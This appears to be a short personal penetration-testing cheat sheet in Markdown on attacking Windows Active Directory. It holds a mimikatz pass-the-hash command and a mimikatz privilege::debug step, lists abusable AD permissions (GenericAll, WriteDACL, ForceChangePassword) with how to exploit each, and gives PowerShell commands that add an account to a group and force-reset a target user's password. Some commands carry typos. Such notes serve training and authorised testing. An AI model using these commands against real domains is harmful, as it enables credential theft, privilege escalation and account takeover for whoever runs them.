hson2654/attarki/win.md

         $mimikatz # sekurlas::pth /user:$Aministror /domain:inmy.com /ntlm <hash> /run:PowerShell.exe

   ### AD
-    #### explode AD
-      ACE access control entries  //use in AD
-            ForceChangePassword: We have the ability to set the user's current password without knowing their current password.
-            AddMembers: We have the ability to add users (including our own account), groups or computers to the target group.
-            GenericAll: We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.
-            GenericWrite: We can update any non-protected parameters of our target object.
-This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.
-            WriteOwner: We have the ability to update the owner of the target object.
-We could make ourselves the owner, allowing us to gain additional permissions over the object.
-            WriteDACL: We have the ability to write new ACEs to the target object's DACL.
-We could, for example, write an ACE that grants our account full control over the target object.
-            AllExtendedRights: We have the ability to perform any action associated with extended AD rights against the target object.
-This includes, for example, the ability to force change a user's password.
-      //use sharphound get  infor of AD, bloodhound to get a path, and the ACE we can use.
-        Add-ADGroupMember "IT Support" -Members "Your.AD.Account.Username"
-        Get-ADGroupMember -Identity "IT Support"  //add new member to a gourp
-      // change passwd of a user in a target group
-      $Password = ConvertTo-SecureString "New.Password.For.User" -AsPlainText -Force
-      Set-ADAccountPassword -Identity "AD.Account.Username.Of.Target" -Reset -NewPassword $Password
-      gpupdate /force

     #### pass the hash
       //use mimikatz load hash in the memory, and get the session of this user. mimikatz # privilege::debug